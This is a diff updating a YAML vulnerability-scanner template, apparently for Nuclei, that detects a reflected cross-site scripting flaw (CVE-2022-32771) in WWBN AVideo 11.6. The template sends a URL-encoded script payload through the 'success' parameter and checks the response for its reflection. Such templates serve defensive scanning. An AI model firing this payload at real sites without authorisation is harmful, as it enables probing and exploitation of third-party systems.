Update CVE-2022-32771.yaml

cves/2022/CVE-2022-32771.yaml

@@ -1,32 +1,40 @@
 id: CVE-2022-32771
 
 info:
-  name: WWBN AVideo 11.6 - Reflected Cross Site Scripting
+  name: WWBN AVideo 11.6 - Cross Site Scripting
   author: arafatansari
   severity: medium
   description: |
-    A cross-site scripting (xss) vulnerability exists in the footer alerts functionality of WWBN AVideo 11.6 via "success" parameter which is inserted into the document with insufficient sanitization.
+     A cross-site scripting (xss) vulnerability exists in the footer alerts functionality of WWBN AVideo 11.6 via "success" parameter which is inserted into the document with insufficient sanitization.
   reference:
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32771
-    - https://github.com/WWBN/AVideo/blob/e04b1cd7062e16564157a82bae389eedd39fa088/updatedb/updateDb.v12.0.sql
     - https://talosintelligence.com/vulnerability_reports/TALOS-2022-1538
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-32771
+  classification:
+    cve-id: CVE-2022-32771
   metadata:
+    verified: true
     shodan-query: http.html:"AVideo"
-    verified: "true"
-  tags: xss,cve,2022, avideo,wwbn
+  tags: cve,cve2022,avideo,xss
 
 requests:
-  - raw:
-      - |
-        GET /index.php?success=</script><script>alert(document.cookie);</script> HTTP/1.1
-        Host: {{Hostname}}
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?success=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"
 
     matchers-condition: and
     matchers:
+      - type: word
+        part: body
+        words:
+          - 'avideoAlertSuccess("</script><script>alert(document.cookie);</script>'
+          - 'text: "</script><script>alert(document.cookie);</script>'
+        condition: or
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
       - type: status
         status:
           - 200
-
-      - type: word
-        words:
-          - '<script>alert(document.cookie);</script>'